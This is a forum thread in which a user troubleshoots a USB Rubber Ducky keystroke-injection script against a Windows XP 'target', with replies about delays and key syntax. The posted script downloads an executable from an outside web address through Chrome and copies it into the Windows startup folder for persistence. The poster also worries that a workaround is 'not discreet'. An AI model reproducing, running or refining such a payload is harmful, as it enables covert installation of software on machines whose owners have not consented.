Posted (edited)

Hi !

I received my Ducky yesterday and I tried to make a script but it didn't work, so I wrote a very simple script to isolate the part that doesn't work. I added a few delays, too, but it didn't solve the problem.

REM Test file
DELAY 2000
GUI r
DELAY 1000
STRING notepad.exe
ENTER

When I try with this one, nothing happens, unless I'm in a webpage or a text editor, and then, the following characters appear on my screen:

rnotepad.exe

So, I guess that the combo "GUI + r" doesn't work. It's quite bothering, I can't do what I wanted, without this shortcut... (I actually want to launch cmd).

I tried a few things but nothing worked:

- Replacing "GUI r" by "WINDOWS r" or "GUI R"

- Trying different encoders. I've tried the online encoder, the v 1.2 command-line encoder, the encoder with a graphical interface.

- Trying different language settings (I have a French keyboard).

- Pressing the button on the Ducky.

I'm running the script on Windows 8.

Do you have any idea on why this shortcut doesn't work and what I could do to solve this?

Thanks a lot. :smile:

Edited by BlueMint
Posted (edited)

On Windows 8, you might want to try:

CONTROL ESCAPE

Instead of

GUI r

Thanks for the help. This shortcut works on Windows 8 (with looong delays), but unfortunately, my real target is a Windows XP. On XP, "CONTROL ESCAPE" only opens the Windows menu, and then, when I type "cmd", the first item beginning with a "c" is launched...

Edited by BlueMint
Posted (edited)

Your initial delay needs to be pretty long due to device detection of the OS. Mileage may vary.

I put a "DELAY 5000" in the beginning, and "GUI r" still doesn't work on Win8.

But it doesn't matter: as phpsystems said, there is still the "CONTROL escape" shortcut in this OS.

Now, I'm testing my payload on Windows XP. It failed a few times, but I understood that it was because I was using it on a VM: some random keys fail, sometimes, with VMs.

Okay, so I tested it on a real Windows XP and the ducky's behaviour is pretty unstable. The worst part is that some commands don't work, like "CONTROL x", "CONTROL c", "CONTROL v". I'm trying to replace them with more complex operations (F10 - RIGHT - DOWN - DOWN - DOWN - ENTER, in Windows Explorer, to copy a file) but it's really bothering, because it takes more time, it's not discreet, and it's not really stable either...

So do you have any idea on why those commands don't work?

Do I have to update the ducky's firmware or anything?

Edited by BlueMint
Posted

Try CTRL vs CONTROL and see if that makes a difference. Post your source you are compiling?

Start with putting some delays between every command to see if it's working properly and then trim down the delays from there.

For example, if you are trying to do GUI + R, cmd, enter too fast, the computer may not have the run box active before the ducky starts typing cmd and enter.

Posted (edited)

Thanks for the help.

So, this is my script. I replaced "CONTROL" by "CTRL" as you suggested, and I put 1000ms delays around the "control" commands:

DELAY 6000
GUI r
DELAY 1000
STRING chrome -incognito "http://mysite/file.exe"
ENTER
DELAY 3000
CONTROL j
DELAY 1000
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
ENTER
DELAY 100
LEFT
DELAY 100
ENTER
DELAY 500
TAB
DELAY 100
ENTER
DELAY 1000
TAB
DELAY 1000
ENTER
DELAY 1000
CTRL c
DELAY 1000
ALT F4
DELAY 1000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
STRING start shell:startup
ENTER
DELAY 1000
CTRL v
DELAY 1000
ENTER
DELAY 1000
DOWN
DELAY 1000
STRING -
DELAY 1000
UP
DELAY 1000
LEFT
DELAY 1000
ENTER
DELAY 1000
ALT f4
DELAY 1000
ALT f4
DELAY 1000

(The part where I download a file in Chrome is only because PowerShell is not installed on my target's computer, and the "ftp" command gives me errors on Windows XP, so I can't get my file directly with the shell).

I'm not sure either about the "STRING -" (to uncheck a Windows box) but my payload stops working before that point.

I made a video. Look, at 00:17, I've "opened file location" in Chrome, and I send the command: CTRL c.

And the path is suddenly selected, and nothing is copied in the clipboard.

I have the same problem with CONTROL c, or with CTRL x.

https://www.youtube.com/watch?v=nbAXdFJ2cLc

Edited by BlueMint
Posted

That is kind of odd. Maybe add a keyboard "b" key press like you were spelling out the program to highlight it and try that out? I don't have a Win XP to test on.

It may be doing something funky with Chrome "Show In Folder" with XP and selecting the path bar instead of the file itself.
